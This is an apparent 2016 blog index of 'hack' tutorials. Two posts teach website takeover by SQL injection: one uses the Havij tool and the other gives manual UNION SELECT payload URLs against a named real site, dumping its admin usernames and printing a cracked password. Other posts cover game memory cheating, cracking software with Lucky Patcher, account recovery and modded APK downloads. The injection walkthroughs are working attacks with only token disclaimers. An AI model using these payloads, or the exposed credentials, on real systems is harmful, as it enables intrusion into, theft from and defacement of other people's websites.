Software Info

Showing posts with label hack. Show all posts

Thursday, September 22, 2016

How To Hack A SQL vulnerable website using Havij

Hack Website Using Havij

Now we move to some serious hacking. It is Website Hacking. We can hack any small scall website by using Havij.

Havij is a nice injecting tool used to hack many small websites. But you can not hack websites like google, facebook, yahoo etc. with Havij.

Firstly, if you haven’t downloaded havij full version, I strongly advice you download it before you continue. You can download it from the following link.

Havij1.16 Pro Download

Link 2

Now run Havij. Now copy paste the SQL Injection vulnerable website into TARGET and click the ANALYZE BUTTON

Now be patient while havij get information about the website like Database Name, Server, Etc.

Secondly, we need to get the table of the website. Now click on Tables and click on Get tables and exercise some patience

to get the database tables.

Thirdly, after getting the tables, Scroll through the entire tables founded, If you suspect any field where admin usernames

or password are stored, Thick on it and click on get columns

Now to the final stage, Click on get data to get the password and username of admin. Now you have the admin usernames

and password. Simply take note of only the username.

The password you got is in Md5 format and cannot be used to login to the website directly. What we need to do is too

simply click on the MD5 tab on havij and paste the password into the text field and click on start. Now havij gives you the

real password.

- Now click on the get admin tab to get the admin login page of the website.

- After getting the admin login page URL, Simply open it in your browser and login using the username and

passwords we got previously.

That it, you are now the admin of the website. You can simply change and delete whatever you want on the server.

NOTE : These tutorials is only for educational purposes, do not implement it on innocent people websites. If you find

vulnerabilities on any website, simply report it to the admin of the website via the contact form.

By Sachin Rastogi

download now

Tuesday, September 20, 2016

How to hack any android game using game killer app Unlimited money gems coins keys hack unlockables Hexadecimal editor Lucky Patcher

Hack any Android game - Method 1

There a quite a few tools in the Android world, that can help you hack the coins/ money or scores to whatever value you want. Many of you would question if its legal, if it will hamper the phone etc and so on. So this post is basically for those who do not want to spend money on buying coins or health. The tool(s) which I am going to use require root, if you already have..you can proceed.

Note: This tutorial is prepared for educational purposes only! Im not responsible for whatever risk you take in hacking any applications.

Hack Method 1:

Prerequisites:

Please ensure that the below prerequisites are met before proceeding:
1) Phone should be rooted
2) Download a software called Game Killer. (Download it from the link provided below)
3) Select a game you wish to hack.

There are other tools like GameCIH, GameGuardian etc which works similarly but i prefer Gamekiller for obvious reasons. Using these apps, it is very easy to crack. But it cant hack all games, some of the newer version of games will detect and not allow to run a "memory hacking tool" to run while playing the game. For hacking purpose, there should be some "value" like score, distance, coins, money etc. that you can target, so that you can buy game equipment/ accessories, health etc. However it is a bit tricky to hack things like fuel, speed etc which are not number based but visual based. And lastly, you cant hack multi player games and online games as well (of which scores are saved on the game server).

Download Game Killer and Lucky patcher

Instructions to hack:
1) Open Gamekiller and minimize it. You can see the icon on the top left corner of screen.

Open Gamekiller

2) Now, Open the particular game which you want to hack and start playing.

Start the game

Open the game

Play the game

3) Ensure that you get some value of the parameter on the screen, so that you can search it.
Here in my example, i have got some coins, which I am searching it.

4) Pause the game in between and click on the Gamekiller icon to bring it up. Find the game coins you have earned (or the thing you want to crack, at that instant)

Open Gamekiller

4) Enter the coins at that instant to the search field (data type: AUTO IDENTIFY).

Search the value

Now you will get a list of memory locations where the similar value is stored. At the first try, there will be lacks or crores or memory location which has the same value.

Searching value

Values found

5) Resume the game and play for some time, to increase the coins.

Resume game

6) Open game killer and enter New coin value as search item and search again.

Search new value

Now your search result will be decreased considerably.

7) Scroll through the memory locations, you will find one or few items with the words mentioned as DWB.
8) Repeat the steps again to limit the search results to minimum 5 or 6 (or maybe 1, your choice)
9) Click on the memory location with DWB, a pop up will appear, with the current value of the coin.

Open the memory location

10) Tap at the value field, and change it to whatever value you want to change.
Change the value and click Ok. You will see the change in the value in the memory location.

Modify the value

Modified value

11) Now play again and ensure that you get few more coins.

Get few more coins

Coins increased

12) Now you will see the value of the coin updated.

Proof of coin increase

Score and coins increased

You can go over the above steps over and over again, when you feel like recharging yourself.

Note: Sometimes you will find that there are more than one memory location to store the score. Of these sometimes one or few of them is the actual location to store the score and others are just dummy values. You can patch each of them and try. However the safest bet is to patch all these entries to crack the game. Its a Trial and error method.

Tip: You can change all the values of the variables in one go. To do that, when you are at the search results page, tap the menu button to bring up the Gamekiller settings. Select "Data Control" and "Modify all values"
Punch in the value you want to change and click OK.

Hacker Sachin Rastogis tip---+++
Patch game killer using lucky patcher to get it registered ( you can also patch many games from lucky patcher as well )
Link-Download Game Killer and Lucky patcher

download now

Wednesday, September 14, 2016

How to Recover Clash Royale Hack Account

Gmail Phishing is one of the most commonly used by hackers, and one of our readers message me @ facebook how she can recover her Clash Royale hack account.

Because hacker already change her Gmail password their are two solution how to get back your hack account.

First: Contact Google

Call or email google about your hack account on google play store that somebody stolen your google email and password and change it! You have to provide some personal identity for verification purposes just like:

Date of Google Account was created
Last log in
Phone Number
Recovery Email
Gmail Contacts
Gmail Labels

Second: Contact Clash Royale Admin

On your Android or iOS device

Launch Clash Royale

Go to Help and Support Settings
Tap on Write New (See Picture Below)

Compose a message, tell them that your account is hack and loss
Now they will reply

Just reply with the exact answers what they ask for verification
Then they will send you a CODE
or They will ask a plus.google.com account like this (plus.google.com/12345678987654321)
They will link your Clash Royale on to that google account
Done!

How to Recover your Clash Royale

Just go to your device setting
Then add the google account on your phone or tablet (the one you give - plus.google.com/12345678987654321)
Now open your Clash Royale
Go to setting and tap on Google Play Sign In

Just choose the google account you give
Done! Congratulation you hack account is recovered!

download now

Wednesday, September 7, 2016

Civilization Revolution 2 Hack Mod Cheats Glitch Tips

Welcome to Civilization Revolution 2 Hack, Mod, Cheats, Glitch, Tips Discussion

The sequel to one of the most successful strategy games on mobile is here! Sid Meiers Civilization Revolution 2 challenges players to build a glorious empire that will stand the test of time. This is the first game in the Civilization catalog to be developed and available exclusively for mobile devices. Civilization Revolution 2 offers mobile strategy fans a brand new 3D presentation and more tactical depth than ever before! Find out if you have what it takes to rule the world!

also read ? Data Eye APK MOD Unlimited Internet

Check out our latest update including:

One New Tech - Artificial Intelligence
Three New Units – Drone, Transport Aircraft and Light Armor
New Leader of the Chinese Civ - Taizong of Tang
New Live Event Maps

also read ? COC Tricks 2016 Reveal Hidden Tesla, Bombs, Traps

Download Civilization Revolution 2
MOD APK + DATA Download

Disclaimer:
If you found working Glitch or Cheats or Bugs on Civilization Revolution 2 please do share and post here.

download now

Monday, September 5, 2016

How to hack deface a sql vulnerable website using sql injection

SQL Injection | Step by Step deface website

Posted by Sachin rastogi / Categories: Hacking Website, Website, website vulnerabilitis /

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the users input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end () that is
www.tartanarmy.com/news/news.php?id=130
and we got an error on the screen because it included the single quote () while processing the results. It assures us that it didnt filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.

We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose admin table, it has columns id,username,password,email.

What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.

SQL Injection Tutorial :-
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on 6
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didnt get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesnt work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
information_schema.tables where table_schema=database()-- Click here
We got first table name on the screen.

To get all tables use group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing table with column
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()-- Click here
There is a repeating element like in this case is id .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got oorwullie in result ( password in clear text).

Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes can not be cracked.
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms.

Kindly mention your queries in comments. The same thing we did can be done easily using automated tools.I will write that in next post. But avoid tools,if you really want to learn new.

download now

Sunday, September 4, 2016

Dragon Encounter APK ALERT CHECK HACK FIX

Fix Dragon Encounter APK "ALERT CHECK HACK"

Are you ready for a new exciting 3D MMO PVP game for your android or iOS mobile?! Introducing the #1 RPG Mobile Game in Japan and Korea!

Dragon Encounter By Playpark Company

Get ready for adventure in Dragon Encounter the No. 1 Free-to-Play Action RPG from Korea!
Immerse yourself in exciting real-time party modes and PvP within the arcade-style fantasy!
Get hooked on the gameplay from the very first minute.
Be amazed by the dazzling visuals and action at the touch of your fingertips.
Real Time Party System
Strategise to defeat dungeon bosses in real-time three-person tag teams.
Exciting PvP and Guild Battles
Push the limits of your skills in friendly matches with your friends and opponents in 1v1 and 3v3
Over 100 Costumes!
Huge variety of costumes to choose at your own choice, even the
Fashionista could enjoy the dress up for the Legendary Costume from Raid Dragon.

also read ? Data Eye APK MOD Unlimited Internet

Game Spec Recommendation:
? Smartphone iphone 5 with iOS 7.0 or higher
? Smartphone Android Dual Cores 1.5 GHz RAM 1GB with Android 4.0 or higher

also read ? Holy Knight En 1.0.800 MOD

How to Fix Dragon Encounter "ALERT CHECK HACK" on Android

? Go to Phone Setting

? Tap APPS then locate Dragon Encounter

? Clear Data / Clear Cache

? Reopen your game

How to Fix Dragon Encounter "Checking Version" loading

? Unroot your Android

? Uninstall lucky patcher

? Uninstall Freedom App

? Clear Data / Clear Cache (Google Play App)

download now

Wednesday, August 24, 2016

Pokemon Go 0 29 2 MOD PokeCoins Hack

As such, it is utterly unsurprising that Pokemon Go hacks, tricks, and secrets have been flooding the internet this week. Almost tech and gaming blogs posted about this phenomenon game! This could be a "Game of the Year 2016".

The Pokemon Go Unlimited Pokecoins Glitch/Hack is working for both iOS and android devices.

Pokemon Go Hack Features: